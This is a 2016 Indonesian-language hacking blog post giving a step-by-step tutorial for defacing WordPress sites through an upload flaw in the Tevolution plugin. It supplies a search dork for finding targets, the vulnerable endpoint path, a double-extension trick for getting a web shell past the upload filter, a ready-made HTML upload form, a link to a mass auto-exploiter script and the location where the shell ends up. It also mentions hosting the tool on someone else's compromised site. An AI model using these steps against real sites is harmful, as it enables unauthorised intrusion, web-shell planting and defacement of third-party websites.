Anonymous: Tutorial Deface WordPress Plugins Tevolution

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB9tpjY0lTrJsRaCtbUqPy2bcjtaHY743O_JEHlztT472aEH3HqBQF6JY3oOQhiGYL_JYKzprShmw8LLDIAcsnJiPNl95n37OnW-BlpJn8TXUHlGkZ2M4bmTdPtMUFqGzAFmVpj2yQ9yY/s400/wordpress2.png

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Bhotax disini, Sekarang bhotax akan Share Tutorial Deface WordPress Plugins Tevolution dengan nue tool buatan IndoXploit *exploitnya lagi booming nih dikalangan dispenser :3 *yang dah expert minggir dlu beb ;*
Exploit ini adalah salah satu bug/celah yg terdapat pada plugins CMS WordPress.

Langsung Intip tutorialnya ;*

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiysg49fN1JCiAdvVJ7qBczfFJdJQqRdOnAkyojgUTJuHFHgVqqZVempI_ZafnD1m0_HkRImCSJA7sNmL5h0_YaeLMzaOTMsQ3_nDLRDAXub9iGi3yEneVmD6YY_OF7hAwXo9HwwHVLri4/s320/bug.jpg

Dork:

inurl:"/wp-content/plugins/Tevolution/"

(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /[path]/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. Vulnerability ~ Blank

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtt7uoTbUaq6iB1V7vvAVw4G4Rv-9P0IguYde5yW9VW5x7p4oWUPDKHIHhrcSX2wkBCwWgOaSmNjyfQ1tEOHylWCQ2lLcaXgUu0ad3gcFSdNcGxfYOkiapke9Dt9hFcZwFGXn-LPt4wo/s640/tevo%2560.png

kurang lebih sih gitu~ akwkwa :v

Kumpulin dulu semua target yang vuln, kalo dah banyak waktunya proses auto tanem shell menggunakan Mass Xploiter buatan tim IndoXploit..
disini gua dh tanem toolnya di web org.
Klik disitu -> Dont touch Me Senpai :')

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_Fo2lPA4Lbrrk6nPjp7nfJv2GMQ-jlBBDM4b0MHrU2KGAl-LWIMbsRCHxdCa0fA5_3xUsN4gXwtig3BiKpSjdKHPC5NwxY9gJRZP1XiA0OYC1H4i0F-aIt5fGvMKzE_bLNw_mgrjwDZM/s640/tevo4.png

Shell name: nuenomaru bisa di ganti dgn sesukalu.php.xxxjpg
*pada exploit ini kita manfaatkan bypass ekstensi shell..

pada kolom Target, pastekan target2 yg pgn ente tusb0l.
Lalu Klik Hajar! , makan akan secara otomatis akan muncul letak shell ente..
lalu klik deh :

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvRJIonGBJcee5mbvpuElrFX6zc39raM0GtW4GqziHs_MUNgfMsm6haM-UQCK5GCVAwYZJuRoeLWiH_CASS4LyBwuyEB9VyO6fXKrcEtptyZ5bJV6gAH9vbNjDYO_ML2AjuiGaEAp6Dic/s640/tevo3.png

file/shell akses: /wp-content/uploads/thn/bln/namashell.php.xxxjpg

disini script Mass Auto xploiter Plugins Tevolution -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy deface ^_^

CSRF:

<form
action="target.coli/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">

</form>

Mudahkan x_O ?

Stay Cool and Keep ./Crotz , gaes <(")

sebelum gua pamit ..
gua ingin mengucapkan Terimakasih yang terbesar-besarnya kepada :

tkjcyberart.bolgsopt.com
om nuemaru ,
om opielcore ,

bhotax cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek saya :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih

source and Big thanks to: blog indoXploit

./Nuenomaru&./Bhotax

Anonymous

Jumat, 13 Mei 2016

Tutorial Deface WordPress Plugins Tevolution

Tidak ada komentar:

Posting Komentar

Mengenai Saya